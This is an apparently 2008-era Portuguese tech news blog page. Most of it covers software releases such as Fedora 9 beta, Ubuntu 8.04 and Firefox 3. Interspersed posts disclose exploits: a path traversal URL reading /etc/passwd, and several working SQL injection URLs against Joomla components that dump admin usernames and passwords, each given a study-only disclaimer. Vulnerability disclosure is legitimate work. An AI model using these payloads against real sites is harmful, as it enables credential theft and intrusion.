Divulgado exploit para escalar localmente o sistema. Divulgamos o link mas não recomendamos o uso para fins não educativos. ABaixo segue link:
http://www.milw0rm.com/exploits/5320
OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos no link.
Foi lançada a nova versão do OpenOffice, um maravilhoso suite de pacotes office, que não ficam para trás se comparado ao Microsoft Office. Além de correções e otimizações, vale a pena acessar o site para baixar esta nova versão. Para quem ainda não conhece, o projeto tem uma linhagem para o mercado brasileiro, que é o BrOffice, todo traduzido e funcional.
Abaixo disponibilizamos o link oficial:
Segundo noticiários, há uma certeza de que o suporte ao Windows XP vai acabar, mas o que muitos não entendem e não acreditam é que no mês de junho isto realmente ocorra. Segundo especialistas em mercado, o maior vilão do Windows Vista hoje é o próprio Windows XP que opera com 1/3 dos recursos do Windows Vista de maneira mais suave para o hardware. Outras fontes indicam que seria mais extenso o suporte. Por questões de marketing ou mesmo como estratégia de negócios, está sendo ocultado o suporte ao Windows XP.
No link abaixo disponibilizamos um link oficial da Microsoft que informa o Ciclo de Vida de seus produtos:
http://support.microsoft.com/gp/lifeselectindex
Nota divulgada pelo ComputerWorld:
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9070119
Nossa! O fedora 8 “chegou agorinha” e já lançaram o Beta do Fedora 9. Estimativa de grandes recursos e mantimento de outros antigos. Abaixo disponibilizamos o link de download da versão beta:
http://fedoraproject.org/get-prerelease
Escolha a modalidade de download e “mãos à obra”!
As novidades mais importantes, a princípio foram:
GNOME 2.22,
KDE 4.0.2,
Firefox 3.0 beta 5,
PackageKit,
Kernel 2.6.25-rc5.
As notas da versão encontram-se no endereço da redhat, no link abaixo:
https://www.redhat.com/archives/fedora-announce-list/2008-March/msg00011.html
Mais uma daquelas vulnerabilidades que, só vendo para entender a ousadia do atacante, e mais, perceber quão perigoso é criar aplicações web e descuidar de um detalhe:
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 << Greetz Zero X >>
OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos.
Nós cansamos de avisar:
CUIDADO com REGISTER_GLOBALS!
Isto é um fato, tanto que própria Zend não recomenda, basta ver no link da documentação oficial:
http://br.php.net/manual/pt_BR/security.globals.php
Abaixo segue a vulnerabilidade que, adivinhe, explora exatamente este recurso:
OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.
Mais uma vulnerabilidade foi detectada.
Como sempre, É QUASE QUE OBRIGAÇÃO que os Sysadmins desabilitem register globals para evitar exploração de vulnerabilidades, que não foi diferente neste caso! Abaixo segue link em txt com a vulnerabilidade:
OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.
Detectada uma vulnerabilidade em um componente para o PHPBB, seguindo abaixo o link em txt com a vulnerabilidade:
OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.
Exploit Cinema 1.0
EXPLOiT 1 : index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/* EXPLOiT 2 : index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*
Exploit d3000
EXPLOiT : index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Exploit rekry
**Bug: http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL] **Exemplo http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
Para as pessoas que usam os componentes acima, procure junto ao site dos desenvolvedores os patches.
Divulgado um novo exploit de acesso root para sistemas Sun Solaris 10. Alerta aos Sysadmins, ACESSEM o site http://www.sun.com/download/index.jsp?cat=Patches%20%26%20Updates&tab=3
Para conferir a vulnerabilidade, baixe o arquivo abaixo:
Para muitas pessoas que ainda não conhecem, o Sistema Operacional Debian é, sem dúvida alguma, um dos sistemas operacionais mais flexíveis e estáveis do mundo. Seu ciclo de desenvolvimento”parece ser lento”, todavia, tal “lentidão” da-se pelo fato de Todos os desenvolvedores sempre que preparam alguma nova versão, colocam esta mesma em uma fase de testes massivos para que seja comprovada e garantida a qualidade do código fonte, evitando explorações de vulnerabilidades e falha em algum serviço do sistema. A Versão 4 (Etch) já é muito badalada, mas já existem divulgações que nos próximos meses estaremos “pondo a mão” na nova versão, o Lenny. Comentar sobre a qualidade deste sistema seria até hediondo pois isso já é comprovado devido sua tradição e uso no meio gnu/linux, a realidade agora é somente o aguardo no que diz respeito a esta nova versão.
Pessoas de diversas partes do mundo já estão testando a versão beta, e muitos já aprovaram.
Para maiores esclarecimentos sobre a nova versão, acesse:
http://www.debian.org/releases/testing/
Para download acesse:
http://cdimage.debian.org/cdimage/weekly-builds/i386/iso-dvd/
É verdade que o OpenBSD é um sistema operacional com altíssimo nível de segurança, aonde os desenvolvedores focam e levam maior parte do tempo somente ajustando os fontes para prevenir exploração de vulnerabilidades.
Na realidade esta notícia deve-se a prévia da nova versão que breve estará disponibilizada no site oficial, a versão 4.3 . Foram adicionadas novas funcionalidades, otimizações junto a drivers para recursos de rede e som. Para conferir o changelog na íntegra, acesse:
http://www.openbsd.org/43.html
http://www.openbsd.org/plus43.html
Para pedir o seu CD (pré-vendas) basta acessar o link abaixo:
Todos sabem o quanto gnu/linux tem crescido ao longo dos anos, principalmente em se tratando de desktop, quem usa ou já usou sabe que está tornando-se muito amigável. Um dos responsáveis por esta “febre” se chama Ubuntu, uma distribuição que está ganhando espaço devido o seu alto nível de customização, flexibilidade, facilidade de uso e boa documentação (nada mais comum em dizer que, sendo baseado no sistema Debian, já existia excelente documentação para o mesmo, um exemplo é o GuiaFoca ). Uma das coisas que mais chama atenção no Ubuntu é sua série LTS, que demonstra confiança para quem está pensando em portar-se para esta distribuição. LTS é a série do Ubuntu que tem suporte estendido (em média 2 ou 3 anos para desktops e 4 a 5 anos para servers de updates e patches de excelente qualidade).
O novo Ubuntu 8.04 ou Hardy Heron já está disponível em uma versão beta, tendo somente 33 dias para ser disponibilizada a versão estável. Para quem não está resistindo e já quer fazer download da versão, estamos disponibilizando links diretos para que você faça o download.
OBS: Prezamos pela qualidade de seu download, por isso, estamos disponibilizando os links oficiais para tal e foram testados antes de serem publicados por nossa equipe.
Desktop i386
http://releases.ubuntu.com/releases/8.04/ubuntu-8.04-beta-desktop-i386.iso
Desktop amd64
http://releases.ubuntu.com/releases/8.04/ubuntu-8.04-beta-desktop-amd64.iso
LVM - Um sistema inicialmente criado pela IBM, que consiste em gerenciamento de volumes lógicos, hoje muito bem portado junto ao linux, está recebendo a aceitação das pessoas. Estamos postando na realidade não uma novidade do LVM (propriamente dito) e sim, uma documentação bastante esclarecedora do uso desta ferramenta, aonde o criador da documentação é um brasileiro apaixonado por linux. Para visualizar a documentação nós disponibilizamos um link dentro do site, todo em TXT ou PDF para que você possa verificar a documentação e porta-la, porém, os créditos do autor estão nela e pedimos que respeite isto!
Para visualizar a documentação em TXT ou PDF.
Fonte: http://www.devin.com.br/eitch/lvm/
O A nova versão do Firefox (o Mozilla Firefox 3) está liberada para downloads e continua com seu crescimento fantástico como sendo uma alternativa ao Internet Explorer (navegador padrão da Microsoft). A versão liberada é um “trial” do que está por vir.
Para conferir a nova versão, faça o download do firefox 3 conosco. A procura é tanta que só o link de download da versão beta já atingiu pagerank 6. Para colher mais informações sobre esta “primeira boa impressão do Firefox 3″, acesse o link:
http://www.reuters.com/article/internetNews/idUSN2041266520080320
Comentários Mais Recentes